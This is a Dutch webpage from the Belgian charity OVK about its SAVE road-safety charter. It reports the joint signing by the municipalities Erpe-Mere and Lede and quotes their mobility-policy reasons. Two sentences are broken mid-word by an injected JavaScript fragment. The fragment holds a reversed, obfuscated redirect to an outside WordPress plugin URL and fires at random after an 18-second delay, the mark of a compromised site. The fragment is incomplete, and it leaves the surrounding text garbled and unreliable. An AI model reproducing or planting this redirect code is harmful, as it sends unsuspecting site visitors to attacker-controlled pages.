Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Erpe-Mere en Lede ondertekenen als Zone het SAVE-charter

Woensdag 1 juli ondertekenden Erpe-Mere en Lede samen het SAVE-charter. De gemeentes Erpe-Mere en Lede streven net als OVK naar een verkeersveilig beleid. De ondertekening was voor beide gemeentes de eerste stap in het SAVE-proces. De volgende is het opstellen van een actieplan. De gemeenten verwoorden hun reden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot deelname zelf als volgt:

“Verkeersveiligheid is een onderwerp dat Erpe-Mere nauw aan het hart ligt. Het mobiliteitsplan van Erpe-Mere werd herzien in 2012. Daarin wordt de grote nadruk gelegd op de zwakke weggebruiker en het invoeren van het STOP-principe. Sindsdien realiseerden we diverse fiets- en voetpaden op hun grondgebied en voerden we in 2012 op alle wegen in Erpe-Mere, behalve de gewestwegen, de 50 km-zone in. We zullen blijven inzetten op het verhogen van de verkeersveiligheid en leefbaarheid in onze gemeente. Via de fietslussen verbinden we zowel fietspaden als trage wegen. We maken ontsluitingen van de diverse dorpskernen naar het administratief centrum Steenberg en naar de diverse scholen op het grondgebied.”

“Streven naar meer verkeersveiligheid is volgens Lede een proces dat constant moet bijgestuurd worden. De eerste grote stappen naar een duurzaam mobiliteitsbeleid heeft Lede reeds gezet in 2005 waarin het eerste gemeentelijk mobiliteitsplan werd ontwikkeld. Daar werd grote nadruk gelegd op de zwakke weggebruiker en het invoeren van het STOP-principe. Sindsdien zijn diverse fiets- en voetpaden gerealiseerd binnen het grondgebied en is de dienstverlening van De Lijn geoptimaliseerd (meer buslijnen, haltes en schuilhuisjes). Ook brachten we in 2010 als één van de eerste gemeenten in Oost-Vlaanderen de algemene snelheid buiten de bebouwde kom terug van 90 km/u naar 70 km/u.

We zullen blijven inzetten op het verhogen van de verkeersveiligheid- en leefbaarheid binnen Lede. Momenteel zijn we bezig aan een compleet nieuw mobiliteitsplan en inventariseren we samen met Trage Wegen VZW in het trage wegennet. OVK legt in het mobiliteitsbeleid de nadruk op kinderen en jongeren. Dit is een doelgroep die ook Lede tracht aan te spreken. Samen met de scholen wordt er tweejaarlijks een vergadering belegd rond verkeersveiligheid met betrekking toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot scholieren (uitloper van duurzaam naar school).”


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be